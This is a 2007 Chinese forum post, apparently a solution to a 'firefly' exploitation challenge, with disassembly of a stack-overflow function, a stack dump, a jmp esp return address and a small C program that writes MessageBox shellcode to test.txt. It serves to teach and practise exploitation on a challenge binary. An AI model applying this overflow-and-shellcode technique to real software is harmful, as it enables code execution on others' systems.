-
-
[原创]firefly<>第二阶段<>答案提交
-
发表于: 2007-8-29 12:45
-
原来的主题关闭了,是不是只能另起新帖?
可以溢出利用的是如下部分的代码
主要是004002EE处的代码会将堆栈覆盖
但程序还会对文本文件中的前8位进行计算
最终根据计算的结果影响覆盖堆栈的大小
00400280 /$ 55 push ebp
00400281 |. 8BEC mov ebp, esp
00400283 |. 83EC 2C sub esp, 2C
00400286 |. 8065 D4 00 and byte ptr [ebp-2C], 0
0040028A |. 56 push esi
0040028B |. 57 push edi
0040028C |. 6A 0A push 0A
0040028E |. 59 pop ecx
0040028F |. 33C0 xor eax, eax
00400291 |. 8D7D D5 lea edi, dword ptr [ebp-2B]
00400294 |. 837D 0C 00 cmp dword ptr [ebp+C], 0
00400298 |. F3:AB rep stos dword ptr es:[edi]
0040029A |. 66:AB stos word ptr es:[edi]
0040029C |. AA stos byte ptr es:[edi]
0040029D |. 7C 51 jl short 004002F0
0040029F |. 8B75 08 mov esi, dword ptr [ebp+8]
004002A2 |. 68 A802CC78 push 78CC02A8
004002A7 |. 68 1B8F9469 push 69948F1B
004002AC |. FF76 04 push dword ptr [esi+4] ; 4~7
004002AF |. FF36 push dword ptr [esi] ; 0~3
004002B1 |. E8 0A030000 call 004005C0
004002B6 |. 68 82FFE65B push 5BE6FF82
004002BB |. 68 854716A5 push A5164785
004002C0 |. 52 push edx
004002C1 |. 50 push eax
004002C2 |. E8 79020000 call 00400540
004002C7 |. 6A 04 push 4
004002C9 |. 8BCE mov ecx, esi
004002CB |. 5F pop edi
004002CC |> 8031 1C /xor byte ptr [ecx], 1C
004002CF |. 8A11 |mov dl, byte ptr [ecx]
004002D1 |. 3051 01 |xor byte ptr [ecx+1], dl
004002D4 |. 41 |inc ecx
004002D5 |. 41 |inc ecx
004002D6 |. 4F |dec edi
004002D7 |.^ 75 F3 \jnz short 004002CC
004002D9 |. 6A 1A push 1A
004002DB |. 59 pop ecx
004002DC |. 2BC8 sub ecx, eax
004002DE |. 0FAFC8 imul ecx, eax
004002E1 |. 81E9 9C000000 sub ecx, 9C
004002E7 |. 85C9 test ecx, ecx
004002E9 |. 7E 05 jle short 004002F0
004002EB |. 8D7D D4 lea edi, dword ptr [ebp-2C]
004002EE |. F3:A5 rep movs dword ptr es:[edi], dword p>
004002F0 |> 5F pop edi
004002F1 |. 33C0 xor eax, eax
004002F3 |. 5E pop esi
004002F4 |. C9 leave
004002F5 \. C3 retn
运行到004002F5处,堆栈内容如下所示
0012FB18 D53A8E7A
0012FB1C 8180F510
0012FB20 EF246C8D
0012FB24 6A4CEC83
0012FB28 6A555500
0012FB2C 4C15FF00
0012FB30 83004002
0012FB34 6C8D70C4
0012FB38 4FC32C24
0012FB3C 6600214B
0012FB40 66657269
0012FB44 293A796C
0012FB48 7FFA4512
0012FB4C 0000D2EB
0012FB50 00000000
0012FB54 00000000
0012FB58 00000000
0012FB5C 00000000
0012FB60 00000000
0012FB64 00000000
esp指向7FFA4512,也就是jmp esp
最终跳回到0012FB4C处执行
在0012FB4C,跳到溢出代码处,如下所示
0012FB20 8D6C24 EF lea ebp, dword ptr [esp-11]
0012FB24 83EC 4C sub esp, 4C
0012FB27 6A 00 push 0
0012FB29 55 push ebp
0012FB2A 55 push ebp
0012FB2B 6A 00 push 0
0012FB2D FF15 4C024000 call dword ptr [<&USER32.MessageBoxA>>; USER32.MessageBoxA
0012FB33 83C4 70 add esp, 70
0012FB36 8D6C24 2C lea ebp, dword ptr [esp+2C]
0012FB3A C3 retn
最终的shellcode代码如下所示:
/* shellcode.c */
#include <stdio.h>
char s[]=
{
0x66, 0xF4, 0x26, 0xEF,
0x0C, 0xE5, 0x9C, 0x01,
0x8D, 0x6C, 0x24, 0xEF,
0x83, 0xEC, 0x4C, 0x6A,
0x00, 0x55, 0x55, 0x6A,
0x00, 0xFF, 0x15, 0x4C,
0x02, 0x40, 0x00, 0x83,
0xC4, 0x70, 0x8D, 0x6C,
0x24, 0x2C, 0xC3, 0x4F,
0x4B, 0x21, 0x00, 0x66,
0x69, 0x72, 0x65, 0x66,
0x6C, 0x79, 0x3A, 0x29,
0x12, 0x45, 0xFA, 0x7F,
0xEB, 0xD2, 0x00, 0x00
};
int main()
{
FILE *fp;
fp = fopen("test.txt", "wb");
fwrite(s, sizeof(s), 1, fp);
fclose(fp);
return 0;
}
/* end */
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
